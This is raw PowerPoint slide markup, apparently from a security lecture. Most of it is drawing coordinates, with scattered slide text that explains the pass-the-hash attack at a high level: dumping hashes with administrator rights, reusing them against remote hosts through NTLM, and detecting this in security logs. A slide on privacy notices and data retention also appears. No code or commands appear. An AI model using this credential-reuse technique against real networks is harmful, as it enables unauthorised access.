                  <a:lnTo>
                    <a:pt x="101147" y="418154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="67198" y="390239"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39185" y="356406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18032" y="317575"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4662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02073" y="617601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17BE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402073" y="617601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250940" y="306451"/>
            <a:ext cx="37560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80">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Pass</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-7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60">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-7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45">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Hash</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-6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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Attack</a:t>
            </a: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86400" y="760476"/>
            <a:ext cx="5291328" cy="36575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4528565" y="3407410"/>
            <a:ext cx="8787765" cy="180657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1691005">
              <a:lnSpc>
                <a:spcPct val="100499"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="80"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-130">
                <a:solidFill>
                  <a:srgbClr val="44484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4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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>local</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-6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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>process</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-11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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>administrator</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-8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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>rights</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>can </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-68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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>dump</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-11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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>these</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-11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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>hash</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-11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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>values.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00">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="753745" marR="5080">
              <a:lnSpc>
                <a:spcPct val="100499"/>
              </a:lnSpc>
            </a:pP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Malware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executes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another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process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remote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host.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Remote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host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will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accept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hash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as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credential.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78248" y="6147561"/>
            <a:ext cx="9196705" cy="162687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004569" marR="5080">
              <a:lnSpc>
                <a:spcPct val="100499"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="80"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-15">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Most</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-12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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>domain</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10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networks</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-114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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>are</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-12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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>configured</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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44484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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>allow</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10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NTLM </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-68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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>as</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-13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44484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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>legacy</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-8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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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method</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-11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for</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-12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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>services.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3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dirty="0" sz="2200" spc="-40">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Detection</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-114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44484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2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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>done</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-11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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>through</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-12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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>security</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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95">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>log</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-12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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>events.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46470" y="1933193"/>
            <a:ext cx="482981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30">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Fea</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-15">
                <a:solidFill>
                  <a:srgbClr val="44484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ures</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10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44484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3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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Pas</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10">
                <a:solidFill>
                  <a:srgbClr val="44484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1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th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2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Hash</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-12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44484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5">
                <a:solidFill>
                  <a:srgbClr val="44484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0">
                <a:solidFill>
                  <a:srgbClr val="44484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0">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-114">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>k</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-13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44484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5">
                <a:solidFill>
                  <a:srgbClr val="44484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60">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>e: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1867" y="4959096"/>
            <a:ext cx="1382268" cy="1382267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75352" y="306451"/>
            <a:ext cx="630364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85">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Privacy</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-140">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="125">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Notices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175">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-125">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="185">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Data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105">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Retention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2671" y="760476"/>
            <a:ext cx="8567928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895411" y="3006792"/>
            <a:ext cx="1823720" cy="4685030"/>
            <a:chOff x="3895411" y="3006792"/>
            <a:chExt cx="1823720" cy="4685030"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="object 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3895411" y="3006792"/>
              <a:ext cx="1823720" cy="4685030"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1823720" h="4685030">
                  <a:moveTo>
                    <a:pt x="93785" y="4611429"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="30793" y="4668706"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114486" y="4684835"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106822" y="4657657"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93658" y="4657657"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="90229" y="4645465"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="102399" y="4641974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93785" y="4611429"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1823720" h="4685030">
                  <a:moveTo>
                    <a:pt x="102399" y="4641974"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="90229" y="4645465"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93658" y="4657657"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="105844" y="4654189"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="102399" y="4641974"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1823720" h="4685030">
                  <a:moveTo>
                    <a:pt x="105844" y="4654189"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="93658" y="4657657"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106822" y="4657657"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="105844" y="4654189"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1823720" h="4685030">
                  <a:moveTo>
                    <a:pt x="106612" y="4640766"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="102399" y="4641974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="105844" y="4654189"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="110168" y="4652958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="148321" y="4640893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106358" y="4640893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106612" y="4640766"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1823720" h="4685030">
                  <a:moveTo>
                    <a:pt x="182939" y="4616636"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="106358" y="4640893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="148321" y="4640893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186876" y="4628701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="220644" y="4616763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182685" y="4616763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182939" y="4616636"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1823720" h="4685030">
                  <a:moveTo>
                    <a:pt x="503559" y="4496113"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="475801" y="4496113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="404173" y="4529895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="331529" y="4561137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="257742" y="4590093"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="257996" y="4590093"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182685" y="4616763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="220644" y="4616763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="262314" y="4602031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="336482" y="4572821"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="409507" y="4541325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="481262" y="4507543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="503559" y="4496113"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1823720" h="4685030">
                  <a:moveTo>
                    <a:pt x="331783" y="4561010"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="331460" y="4561137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="331783" y="4561010"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1823720" h="4685030">
                  <a:moveTo>
                    <a:pt x="404427" y="4529768"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="404132" y="4529895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="404427" y="4529768"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1823720" h="4685030">
                  <a:moveTo>
                    <a:pt x="639135" y="4422199"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="614485" y="4422199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="545651" y="4460299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="475719" y="4496152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="503559" y="4496113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="551620" y="4471475"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620708" y="4433248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="639135" y="4422199"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1823720" h="4685030">
                  <a:moveTo>
                    <a:pt x="545778" y="4460172"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="545531" y="4460299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="545778" y="4460172"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1823720" h="4685030">
                  <a:moveTo>
                    <a:pt x="705079" y="4381940"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="681668" y="4381940"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="614231" y="4422326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="614485" y="4422199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="639135" y="4422199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="688272" y="4392735"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="705079" y="4381940"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1823720" h="4685030">
                  <a:moveTo>
                    <a:pt x="894733" y="4248844"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="874327" y="4248844"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="811462" y="4295326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="747200" y="4339776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="681414" y="4382067"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="681668" y="4381940"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="705079" y="4381940"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="754312" y="4350317"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="818828" y="4305613"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="881947" y="4259004"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="894733" y="4248844"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1823720" h="4685030">
                  <a:moveTo>
                    <a:pt x="747327" y="4339649"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="747130" y="4339776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="747327" y="4339649"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1823720" h="4685030">
                  <a:moveTo>
                    <a:pt x="811589" y="4295199"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="811406" y="4295326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="811589" y="4295199"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1823720" h="4685030">
                  <a:moveTo>
                    <a:pt x="954855" y="4200457"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="935287" y="4200457"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="874073" y="4248971"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="874327" y="4248844"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="894733" y="4248844"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="943161" y="4210363"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="954855" y="4200457"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1823720" h="4685030">
                  <a:moveTo>
                    <a:pt x="1126133" y="4043866"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1108388" y="4043866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1052254" y="4098095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="994596" y="4150292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="935033" y="4200584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="935287" y="4200457"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="954855" y="4200457"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1002978" y="4159690"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1061017" y="4107366"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1117278" y="4053010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1126133" y="4043866"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1823720" h="4685030">
                  <a:moveTo>
                    <a:pt x="994723" y="4150165"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="994573" y="4150292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="994723" y="4150165"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1823720" h="4685030">
                  <a:moveTo>
                    <a:pt x="1231596" y="3930455"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1214941" y="3930455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1162490" y="3988240"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1108328" y="4043924"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1126133" y="4043866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1171761" y="3996749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1224339" y="3938964"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1231596" y="3930455"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1823720" h="4685030">
                  <a:moveTo>
                    <a:pt x="1162617" y="3987986"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1162371" y="3988240"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1162617" y="3987986"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1823720" h="4685030">
                  <a:moveTo>
                    <a:pt x="1329777" y="3810313"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1313874" y="3810313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1265233" y="3871400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1214814" y="3930582"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1231596" y="3930455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1275139" y="3879401"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1323907" y="3818187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1329777" y="3810313"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1823720" h="4685030">
                  <a:moveTo>
                    <a:pt x="1265360" y="3871146"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1265144" y="3871400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1265360" y="3871146"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1823720" h="4685030">
                  <a:moveTo>
                    <a:pt x="1375977" y="3747829"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1360483" y="3747829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1313747" y="3810440"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1329777" y="3810313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1370770" y="3755322"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1375977" y="3747829"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1823720" h="4685030">
                  <a:moveTo>
                    <a:pt x="1420196" y="3683694"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1405060" y="3683694"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1360356" y="3747956"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1360483" y="3747829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1375977" y="3747829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1415601" y="3690806"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1420196" y="3683694"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1823720" h="4685030">
                  <a:moveTo>
                    <a:pt x="1462329" y="3618035"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1447605" y="3618035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1404933" y="3683821"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1420196" y="3683694"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1458273" y="3624766"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1462329" y="3618035"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1823720" h="4685030">
                  <a:moveTo>
                    <a:pt x="1502534" y="3550852"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1487991" y="3550852"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1447478" y="3618162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1447605" y="3618035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1462329" y="3618035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1498913" y="3557329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1502534" y="3550852"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1823720" h="4685030">
                  <a:moveTo>
                    <a:pt x="1540530" y="3482399"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1526218" y="3482399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1487864" y="3550979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1487991" y="3550852"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1502534" y="3550852"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1537394" y="3488495"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1540530" y="3482399"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1823720" h="4685030">
                  <a:moveTo>
                    <a:pt x="1576305" y="3412422"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1562286" y="3412422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1526091" y="3482526"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1540530" y="3482399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1573589" y="3418137"/>
